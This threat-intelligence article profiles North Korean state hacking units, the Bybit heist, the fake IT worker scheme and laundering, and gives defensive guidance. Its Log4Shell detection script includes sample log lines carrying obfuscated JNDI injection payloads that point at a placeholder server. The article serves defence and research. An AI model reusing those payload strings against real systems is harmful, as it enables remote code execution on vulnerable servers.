When most people hear "North Korean hacker," they picture a single shadowy group running cryptocurrency heists. The reality is a structured, multi-mission intelligence apparatus with distinct units, separate objectives, and combined revenue that now constitutes a significant portion of the regime's external income. Understanding the DPRK cyber threat requires understanding the architecture behind it — not just the headline operations, but the division of labor that makes those operations possible at scale.
The fundamental organizing body is the Reconnaissance General Bureau, or RGB — North Korea's primary foreign intelligence service. Virtually every DPRK cyber threat group of significance operates under the RGB's authority, with missions assigned based on strategic priority: financial generation to fund weapons programs, intelligence collection on adversaries, disruption of South Korean systems, and increasingly, infiltration of Western technology companies through the regime's IT worker program.
These missions run in parallel. The same week a Lazarus Group subunit was laundering Ethereum stolen in the Bybit hack, Kimsuky operators were running spearphishing campaigns against South Korean think tanks, Andariel actors were staging ransomware against U.S. healthcare entities, and teams of fake IT workers were sitting in corporate Slack channels at technology companies in North America and Europe. This is not a single threat. It is a program.
The 2025 Numbers
By any measure, 2025 was the DPRK cyber apparatus's most productive year on record. Chainalysis confirmed that North Korea-linked actors stole $2.02 billion in cryptocurrency — surpassing the previous annual record of $1.7 billion set in 2022 — and accounted for 76% of all cryptocurrency service compromises globally. The cumulative total over the past four years reached at least $6.75 billion.
At a glance: $2.02 billion stolen in 2025 (record) · 76% of global cryptocurrency service compromises (DPRK) · 320+ companies infiltrated by IT workers · 8,400 cyber personnel (est.)
The IT worker program, tracked separately from the hacking operations, infiltrated over 320 companies in the twelve months covered by CrowdStrike's 2025 Threat Hunting Report — a 220% increase over the prior year period. South Korea's National Intelligence Service estimated North Korea's cyber workforce grew from 6,800 personnel in 2022 to 8,400 by 2024, encompassing IT worker infiltrators, cryptocurrency thieves, and military hackers operating across multiple units.
The Bybit hack alone — a single operation executed on February 21, 2025 — accounted for $1.5 billion of the year's total, representing one-third of all cryptocurrency stolen globally in 2025. It set a new record as the largest cryptocurrency heist in history, surpassing the Ronin Network breach, and would rank as the largest bank robbery in recorded history if Bybit were classified as a traditional financial institution.
The RGB Structure: Who Operates What
The Lazarus Group label has become a source of significant confusion in threat intelligence. It is used in public reporting as an umbrella term covering multiple distinct RGB subunits, each with different targeting mandates, toolsets, and operational focuses. Understanding the actual structure matters because attribution at the "Lazarus" level is too coarse to drive meaningful defensive decisions.
| Group (Aliases) | Parent Unit | Primary Mission | Key Targets |
|---|---|---|---|
| TraderTraitor (Jade Sleet, Slow Pisces) | RGB 3rd Bureau (Lab 110) | Financial theft | Crypto exchanges, DeFi protocols, blockchain developers |
| Andariel (Onyx Sleet, Silent Chollima, Stonefly) | RGB 3rd Bureau | Espionage + ransomware | Defense, aerospace, nuclear, engineering; U.S. healthcare (ransomware) |
| Kimsuky (APT43, Emerald Sleet, Velvet Chollima, Springtail) | RGB (5th Bureau) | Intelligence collection | Think tanks, government, journalists, academia, South Korean institutions |
| Diamond Sleet (Selective Pisces, TEMP.Hermit, ZINC) | RGB 3rd Bureau | Espionage + destruction | Media, defense, IT organizations; network disruption |
| Moonstone Sleet (formerly Storm-1789) | RGB-linked | Financial + espionage | Software developers, defense contractors, education; custom ransomware (FakePenny) |
| Famous Chollima (Jasper Sleet; IT workers) | Department 53 | Revenue generation | Any remote-friendly employer; technology companies, crypto firms, U.S. government contractors |
| APT37 (Ricochet Chollima, ScarCruft) | Ministry of State Security | Domestic + regional espionage | North Korean defectors, South Korean civil society, human rights organizations |
A key operational reality is that these groups are not siloed. CISA has documented Andariel launching ransomware attacks against U.S. healthcare entities on the same day as conducting cyber espionage against the same or adjacent targets. Kimsuky has used cybercrime to fund espionage operations. Moonstone Sleet, identified by Microsoft in 2024 as a distinct actor, combines financially motivated theft with espionage objectives and has been observed as a Qilin ransomware affiliate — blurring the line between state-directed cyber operations and the broader criminal ecosystem.
The Bybit Operation: How $1.5 Billion Disappeared in 30 Minutes
The February 21, 2025 compromise of Bybit is the defining DPRK cyber operation of the year and deserves granular attention — not for its scale alone, but for what the attack methodology reveals about the sophistication of DPRK financial operations.
Bybit used Safe, an open-source multisignature wallet platform, to manage its Ethereum holdings. Any transaction required multiple cryptographic signatures from authorized Bybit personnel before it could execute. This is a standard security control designed precisely to prevent single-point compromise. The Lazarus subunit operating as TraderTraitor understood this and targeted the control at its source.
The operation began well before February 21. TraderTraitor actors, described by investigators as having prepared for "definitely more than a month, probably many months", identified and compromised a developer at Safe, most likely through phishing. That developer's access reached Safe's live web front end and codebase, and the attackers used it to plant dormant malicious JavaScript in the interface Bybit's signers were using.
When a Bybit signer opened Safe to authorize a routine cold-to-warm wallet transfer, the dormant code activated. The interface rendered the expected destination and a legitimate-looking transfer. Underneath, the injected JavaScript substituted a different transaction for signing: a delegatecall that replaced the logic behind Bybit's cold-wallet contract, giving the attackers control of everything it held. The signers had no check on the transaction data that was independent of the web page in front of them, so each signature approved the swapped payload. Within 30 minutes, roughly 400,000 ETH plus liquid-staked ETH tokens, worth about $1.5 billion, had been moved to addresses controlled by North Korea. Two minutes after execution, the attackers updated Safe's website to remove the injected code and cover their tracks.
"The stolen cryptocurrency doesn't go to fancy cars and expensive watches. It goes to centrifuges and warheads." — CryptoImpactHub analysis, 2025
The FBI attributed the operation to TraderTraitor on February 26, 2025, releasing 51 Ethereum addresses used in laundering and urging cryptocurrency service providers to block associated transactions. By March 20, Bybit CEO Ben Zhou reported that TraderTraitor had already converted 86.29% of the stolen ETH to Bitcoin through a dizzying chain of intermediary wallets, decentralized exchanges, and cross-chain bridges. The 45-day laundering window following major heists has become a predictable operational pattern for DPRK crypto operations.
The Bybit operation was not a direct attack on Bybit. It was a supply chain attack on a trusted third-party tool. Bybit's own infrastructure was not compromised — the attack entered through a developer at Safe. Organizations relying on open-source or third-party wallet infrastructure, signing tools, or any software that intermediates high-value financial transactions need to treat their tooling vendors as part of their own attack surface.
The IT Worker Army: A Threat HR Wasn't Built to Detect
The DPRK IT worker scheme is structurally different from every other threat covered in this article, and that structural difference is exactly what makes it so effective. This is not a technical intrusion. It is a human resources problem that produces technical consequences.
North Korea trains young men in technology, deploys them in teams of four or five to locations across China, Russia, Nigeria, Cambodia, the United Arab Emirates, and elsewhere, and directs them to secure remote employment at Western technology companies using fabricated identities. The program operates under Department 53 of the RGB and exists to generate revenue: individual workers can earn up to $300,000 per year in legitimate salaries, a typical four-to-five person cell can generate up to $3 million annually, and most of that money flows back to Pyongyang.
What changed dramatically in 2025 was the integration of AI at every stage of the operation. Okta Threat Intelligence documented facilitators using generative AI tools to optimize job applications, craft responses to technical screening questions, fabricate profile photographs, overcome language barriers in written communications, and run mock AI-agent interviews to evaluate the effectiveness of deepfake overlays before live video calls. CrowdStrike observed IT workers paying premium prices for real-time face-swapping subscriptions and using them during video interviews — with a single operator capable of interviewing for the same position multiple times under different synthetic personas.
Unit 42 researchers demonstrated in April 2025 that a researcher with no prior image manipulation experience could create a convincing synthetic identity for video interviews in approximately 70 minutes using freely available tools and a five-year-old computer. The barrier to running this operation at scale is no longer technical. It is organizational.
The Department of Justice's June 30, 2025 enforcement action identified over 100 U.S. companies as victims in a single scheme, including searches of 29 suspected laptop farms across 16 states. One facilitator allowed DPRK nationals based in Shenyang, China, to use his identity to secure employment at the FAA and at least 12 other U.S. companies. The program has reached U.S. government contractors and federal agencies.
The threat has also evolved beyond simple salary diversion. The FBI confirmed in January 2025 that it had observed IT workers engaging in data theft and extortion — exfiltrating proprietary code and sensitive data, then demanding ransom to prevent its release. Secureworks' Counter Threat Unit noted that the program's economic pressure is driving this shift: "No longer are they just after a steady paycheck — they are looking for higher sums, more quickly, through data theft and extortion, from inside the company defenses."
Google's Threat Intelligence Group identified one individual operating 12 separate personas simultaneously across the U.S. and Europe. Amazon blocked 1,800 suspect applications. Microsoft suspended 3,000 known Microsoft consumer accounts created by DPRK IT workers. The program is not a fringe operation run by a handful of actors — it is an industrialized infiltration campaign with measurable organizational infrastructure behind it.
The Contagious Interview Campaign
Separate from — though operationally related to — the IT worker infiltration scheme is Contagious Interview, a long-running campaign that targets job seekers rather than infiltrating companies. In Contagious Interview operations, DPRK-linked actors operate as fake recruiters on LinkedIn and freelancing platforms, approaching developers, cryptocurrency professionals, and AI researchers with job opportunities. The workflow leads targets through a staged hiring process that ultimately delivers malware.
SentinelLabs identified over 230 confirmed victims between January and March 2025 alone, with the actual total assessed as significantly higher. The campaign continued to evolve throughout the year — Validin documented a highly polished variant in November 2025 using a fully realized fake SaaS product called "Lenvny," presented as an AI-powered interview tool, to lure AI researchers specifically. The sophistication of the lure infrastructure had reached a level the researchers described as "dangerously convincing."
The standard Contagious Interview attack chain runs: LinkedIn message → staged interview process → video response request → "fix your webcam" ClickFix prompt → malware delivery. The BeaverTail infostealer and InvisibleFerret backdoor are among the payloads most consistently associated with the campaign, with the malware ultimately used for credential theft, lateral movement, and cryptocurrency wallet exfiltration.
Kimsuky: The Intelligence Collector
Where Lazarus-umbrella units focus heavily on financial theft, Kimsuky — also tracked as APT43, Emerald Sleet, Velvet Chollima, and Springtail — operates primarily as an intelligence collection apparatus. Its mission is to gather information useful to Pyongyang on foreign policy, diplomatic positions, defense programs, and the activities of South Korean institutions and individuals who could threaten the regime.
Kimsuky's targeting profile is distinct from the financially motivated units: government employees, foreign policy think tanks, academics, journalists, human rights organizations, and South Korean institutions involved in North Korean affairs. The group is also known to target North Korean defectors and individuals who assist defectors — an enforcement mission that extends the regime's coercive reach beyond its borders.
The group has been active since at least 2014 and uses a combination of spearphishing and moderately sophisticated technical capabilities. It has deployed a rotating toolkit of malware including AppleSeed, the Gomir Linux backdoor, TRANSLATEXT (a browser extension targeting South Korean academia), and the Troll Stealer. Its February 2025 DEEP#DRIVE campaign used trusted cloud platforms including Google Docs, Dropbox, and OneDrive as delivery mechanisms for targeted attacks — a pattern of abusing legitimate infrastructure to evade detection that has become standard across the DPRK toolkit.
Mandiant's APT43 reporting specifically highlighted Kimsuky's use of cybercrime to fund espionage operations — stealing cryptocurrency not as an end goal but as a mechanism to pay for the operational costs of intelligence collection. This blending of criminal and espionage activities makes Kimsuky harder to categorize than groups with a single clear mission.
Andariel: The Dual-Use Unit
Andariel — also tracked as Onyx Sleet, Silent Chollima, and Stonefly — is among the clearest examples of how DPRK cyber operations blur the line between financial crime and state espionage. Under the RGB's 3rd Bureau, Andariel conducts intrusions targeting defense, aerospace, nuclear, and engineering entities to acquire sensitive technical information and intellectual property. Its espionage mission is directly tied to the regime's weapons development ambitions.
At the same time, Andariel funds its espionage activity through ransomware operations against U.S. healthcare entities. CISA has documented the group launching ransomware attacks and conducting cyber espionage operations against the same target on the same day. The ransomware income from healthcare victims generates the operational budget for intrusions into defense contractors. The healthcare sector is collateral damage in a state weapons program.
Andariel's initial access methodology favors exploitation of known vulnerabilities in public-facing web servers, including Log4Shell (CVE-2021-44228) in Log4j, to deploy web shells that provide persistent access to internal networks. Once inside, the group moves laterally toward systems holding technical specifications, engineering documents, and research data relevant to the regime's military priorities.
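As an added example, not a detection published by CISA or any vendor, the following Python flags Log4Shell-style JNDI lookups in web access logs, including the nested-lookup (`${${lower:j}ndi:...}`, `${::-j}`) and URL-encoded variants that defeat a naive `${jndi:` string match. It is a compensating control for spotting exploitation attempts against the exposed servers this paragraph describes, not a substitute for patching; the `SAMPLE_LOG` lines, IP addresses and hostnames are constructed for the example.

```python
"""Added example (not CISA's or any vendor's detection): flag Log4Shell-style
JNDI lookup strings in web access logs, including the nested-lookup and
URL-encoded obfuscations attackers use to evade naive pattern matches.
The log lines, IPs and hosts below are constructed for the example."""
import re
from typing import Optional
from urllib.parse import unquote

# An innermost ${...} lookup: nothing nested, no '$' inside.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A jndi lookup using one of the schemes Log4j's JNDI lookup can resolve.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)


def _decode(s: str, max_layers: int = 3) -> str:
    """Undo URL encoding, including double encoding, until the text stops changing."""
    for _ in range(max_layers):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def deobfuscate(s: str, max_rounds: int = 20) -> str:
    """Evaluate the obfuscation-only lookups Log4j resolves before the jndi one:
    ${lower:x}, ${upper:x}, and ${prefix:name:-default} (the ${::-j} trick).
    Lookups of any other kind are left untouched."""
    for _ in range(max_rounds):
        changed = False

        def resolve(m):
            nonlocal changed
            tok = m.group(1)
            if ":-" in tok:                               # ${::-j} / ${env:NOPE:-j} -> j
                changed = True
                return tok.split(":-", 1)[1]
            kind, sep, val = tok.partition(":")
            kind = kind.strip().lower()
            if sep and kind in ("lower", "upper"):
                changed = True
                return val.lower() if kind == "lower" else val.upper()
            return m.group(0)                             # jndi:, date:, env: stay as written

        s = INNER.sub(resolve, s)
        if not changed:
            break
    return s


def detect_jndi(line: str) -> Optional[str]:
    """Return the JNDI scheme found in a log line after decoding, or None."""
    m = JNDI.search(deobfuscate(_decode(line)))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line index, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = detect_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed access-log sample: one benign request, four obfuscation styles, one benign lookup.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2025:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2025:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '198.51.100.9 - - [10/Mar/2025:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.9:1099/x}"',
    '198.51.100.9 - - [10/Mar/2025:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.9/z}"',
    '198.51.100.9 - - [10/Mar/2025:10:00:05 +0000] "GET /?q=%24%7B%24%7Bupper%3Aj%7Dndi%3Adns%3A%2F%2F198.51.100.9%2Fq%7D HTTP/1.1" 400 0 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Mar/2025:10:00:06 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOG):
        print(f"line {idx}: jndi lookup via {scheme}")
```

The normalizer mirrors what the vulnerable library itself does: it resolves inner lookups first, so the detector sees the same `${jndi:...}` string Log4j would have seen. Matching on the User-Agent and query string in the same pass matters because the injection point is any logged field, not just the path.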
Moonstone Sleet: The Newest Hybrid Threat
Moonstone Sleet, identified by Microsoft in May 2024 and increasingly active in 2025, represents the evolution of the DPRK threat model toward hybrid financial and espionage operations with a distinctive social engineering component.
The group sets up fake companies and fabricated job opportunities to lure developers and technical professionals into executing malicious code. It has used fake npm packages distributed via LinkedIn and freelancing platforms, trojanized versions of legitimate tools including PuTTY, and even a fully functional malicious game, DeTankWar, presented as a blockchain project, as malware delivery vehicles. The group's custom ransomware, FakePenny, was first observed in April 2024 and is one of the few documented cases of a DPRK unit deploying ransomware as a primary tool rather than a side revenue stream.
Bitdefender's November 2025 reporting linked Moonstone Sleet to a massive increase in ransomware attacks on South Korea, with the country temporarily becoming the second most targeted ransomware victim globally — highly unusual for a country that typically does not rank in the top five. The campaign operated through Qilin's RaaS affiliate program, making Moonstone Sleet the first DPRK-linked group confirmed to have participated in a Russian criminal ransomware operation as an affiliate. Microsoft's separate reporting on shared infrastructure between Moonstone Sleet and Russian-aligned Gamaredon — with the same IP serving both groups within days — suggests the Russia-DPRK operational relationship in cyberspace is deepening.
Symantec has also pointed to Lazarus Group working with Medusa Ransomware, another group believed to operate out of Russia. The use of Russian criminal RaaS infrastructure by DPRK actors creates a new attribution problem: attacks that appear to be Russian criminal ransomware may involve DPRK operators as affiliates, and vice versa. Traditional state-centric threat models were not designed for this level of criminal-state operational overlap.
The Money Laundering Infrastructure
Stealing cryptocurrency at the scale DPRK units do requires an equally sophisticated laundering infrastructure, and this is an area where the regime has built durable, multi-layered capability over years of operation.
The standard DPRK laundering pattern following a major crypto heist follows a rapid, predictable sequence. Stolen assets are first converted to Bitcoin, which the laundering crews favor because its UTXO model lets funds be split and recombined across large numbers of addresses in ways that complicate clustering. Funds then move through a cascade of intermediary wallets, decentralized exchanges where no KYC is required, and cross-chain bridges that hop between blockchains to break the tracing chain. The entire process, from initial conversion to near-untraceable dispersion, takes approximately 45 days based on documented post-incident analysis.
Chainalysis noted that DPRK actors make heavy use of professional Chinese-language money laundering services and over-the-counter brokers, consistent with Pyongyang's historical reliance on China-based networks to access international financial systems. U.S. sanctions have increasingly targeted Chinese and Russian OTC brokers and shell companies facilitating DPRK proceeds, but the networks adapt faster than sanctions can follow.
The regime's accumulated cryptocurrency reserves — $6.75 billion over four years — have been described by analysts as a shadow national treasury: a sanctions-resistant reserve fund held in a form that no government can freeze, confiscate, or audit through conventional financial mechanisms. U.S. and UN officials now openly state that cryptocurrency theft directly funds North Korea's weapons of mass destruction programs.
What Organizations Need to Do
The DPRK threat is unusual because it operates simultaneously across the technical, human, and financial attack surfaces. Defending against it requires specific attention to vectors that many security programs treat as secondary.
For organizations handling cryptocurrency or digital assets
The Bybit operation made clear that multisig wallet security is only as strong as the weakest link in the signing infrastructure, which includes every third-party tool or service that mediates the signing process. Treat your wallet tooling vendors as part of your own attack surface. Audit the integrity of signing interfaces before authorizing high-value transactions, compare the transaction digest shown on the signing device with one computed independently of the web interface, refuse delegatecalls and unknown destinations by policy, implement out-of-band verification for large transfers, and segment developer environments from production wallet infrastructure.
For organizations hiring remote technical workers
The IT worker threat is a hiring process problem before it is a security problem. Standard background checks are not sufficient when applicants are using AI-generated documentation, deepfake video in live interviews, and facilitators who physically handle corporate laptops at domestic addresses. Detection requires HR and security operating together: live unscripted video challenges that expose deepfake artifacts, device geolocation monitoring from day one, IP-locking remote workers to expected regions, and continuous behavioral monitoring for anomalous data access patterns after onboarding. Any remote candidate who routes corporate equipment to a third-party address before setup should be treated as a red flag without exception.
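The HR-plus-telemetry correlation described above, as an added example that is not CrowdStrike's, Okta's or any vendor's detection logic: it joins constructed HR onboarding records with constructed VPN/EDR events and raises the four signals the paragraph names (laptop shipped somewhere other than the stated home, several employees' devices egressing from one non-office IP, remote-control tooling on a new hire's machine, and logins from outside the expected region), escalating only when more than one signal stacks up on the same hire. Names, IPs, device IDs, the office egress allowlist and the remote-control tool list are all assumptions of the example.

```python
"""Added example (not CrowdStrike's, Okta's or any vendor's detection): join HR
onboarding data with VPN/EDR telemetry to surface laptop-farm and geo-mismatch
patterns. All names, IPs, device IDs and the allow/deny lists are constructed."""
from collections import defaultdict

EXPECTED_COUNTRY = "US"
# Assumption: remote-control tools that are not part of the corporate baseline.
REMOTE_CONTROL_TOOLS = {"anydesk.exe", "teamviewer.exe", "rustdesk.exe"}
# Assumption: known office / VPN-concentrator egress IPs, where many users per IP is normal.
OFFICE_EGRESS_IPS = {"203.0.113.1"}

# Hypothetical HR records: stated home state and where the laptop was actually shipped.
ROSTER = {
    "alice": {"home_state": "TX", "ship_state": "TX"},
    "bob":   {"home_state": "OH", "ship_state": "AZ"},   # rerouted to a third-party address
    "carol": {"home_state": "CA", "ship_state": "CA"},
    "dave":  {"home_state": "FL", "ship_state": "AZ"},
}

# Constructed telemetry: (user, device, public_ip, geo_country, geo_state, process)
EVENTS = [
    ("alice", "LT-0101", "203.0.113.10", "US", "TX", "slack.exe"),
    ("bob",   "LT-0102", "198.51.100.7", "US", "AZ", "anydesk.exe"),
    ("carol", "LT-0103", "192.0.2.44",   "US", "CA", "code.exe"),
    ("dave",  "LT-0104", "198.51.100.7", "US", "AZ", "teamviewer.exe"),
    ("bob",   "LT-0102", "198.51.100.7", "US", "AZ", "outlook.exe"),
    ("carol", "LT-0103", "192.0.2.44",   "RU", "",   "code.exe"),   # travelling, or not who we think
]


def analyze(roster, events, office_ips=OFFICE_EGRESS_IPS):
    """Return {user: sorted finding codes} for every user with at least one finding."""
    findings = defaultdict(set)
    users_by_ip = defaultdict(set)
    for user, _device, ip, country, state, proc in events:
        users_by_ip[ip].add(user)
        if country != EXPECTED_COUNTRY or state != roster[user]["home_state"]:
            findings[user].add("GEO_MISMATCH")
        if proc.lower() in REMOTE_CONTROL_TOOLS:
            findings[user].add("REMOTE_CONTROL_TOOL")
    for user, hr in roster.items():
        if hr["ship_state"] != hr["home_state"]:
            findings[user].add("SHIPPING_MISMATCH")
    # Two or more distinct employees behind one non-office IP is the laptop-farm signature.
    for ip, users in users_by_ip.items():
        if ip not in office_ips and len(users) >= 2:
            for user in users:
                findings[user].add("SHARED_RESIDENTIAL_IP")
    return {user: sorted(codes) for user, codes in findings.items()}


def escalate(findings, min_findings=2):
    """Users whose independent signals stack up; any single signal on its own is usually benign."""
    return sorted(u for u, codes in findings.items() if len(codes) >= min_findings)


if __name__ == "__main__":
    result = analyze(ROSTER, EVENTS)
    for user in escalate(result):
        print(user, result[user])
```

The shared-IP rule is the one that does the real work against laptop farms, because it is the one a facilitator cannot fix with better paperwork: two hires who supposedly live in different states but whose laptops sit behind the same residential address are visible on day one, before any data ever leaves.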
For defense contractors, aerospace, and engineering firms
Andariel's targeting mandate is directly aligned with the technical specifications and intellectual property that defense industrial base companies hold. Exploitation of Log4j and similar known vulnerabilities in public-facing systems remains a primary initial access vector — patch cadence for internet-exposed infrastructure must be treated as a critical operational priority, not a routine IT task. Segment systems holding sensitive technical documentation from networks reachable from the public internet.
For any organization
Kimsuky's spearphishing operations are well-resourced, personalized, and designed to target individuals with access to strategically valuable information. Security awareness training that covers North Korean-specific social engineering tactics — including fake job offers, fabricated research collaboration invitations, and impersonation of known contacts — is relevant beyond the organizations that would traditionally consider themselves DPRK targets. The regime's targeting scope has expanded substantially as its revenue mandates have grown.
Key Takeaways
- The DPRK cyber threat is a multi-mission program, not a single group. Distinct units operate under the RGB with different targets and methodologies. Attribution to "Lazarus" without further specification is too imprecise to drive meaningful defensive action.
- 2025 was the record year for DPRK crypto theft. $2.02 billion stolen, $6.75 billion cumulative over four years — these funds directly finance weapons programs. Cryptocurrency platforms and any organization touching digital assets are priority targets.
- The IT worker program is a hiring crisis, not just a security crisis. North Korean operators are inside corporate environments with legitimate access, earning legitimate salaries, and in some cases stealing data and extorting their employers. HR and security must work together to address this threat.
- Supply chain is the preferred attack vector for high-value targets. Bybit was not compromised directly. A third-party developer tool was. The regime has demonstrated consistent ability to identify and exploit trusted intermediaries — wallet providers, software platforms, identity tools, and developer services — to reach otherwise well-defended targets.
- The Russia-DPRK operational relationship in cyberspace is deepening. Moonstone Sleet operating as a Qilin affiliate, Moonstone Sleet infrastructure overlapping with Russian-aligned Gamaredon, and DPRK actors relying on Russia- and China-based OTC brokers for laundering all point toward an alignment that undermines the traditional assumption that nation-state and criminal cyber threats are separate problems.
- AI has materially lowered the barrier to IT worker infiltration. Deepfake interviews, AI-generated applications, and LLM-assisted technical performance have made fake candidates significantly harder to screen out with conventional hiring processes. Organizations must update their identity verification workflows or accept this risk as a given.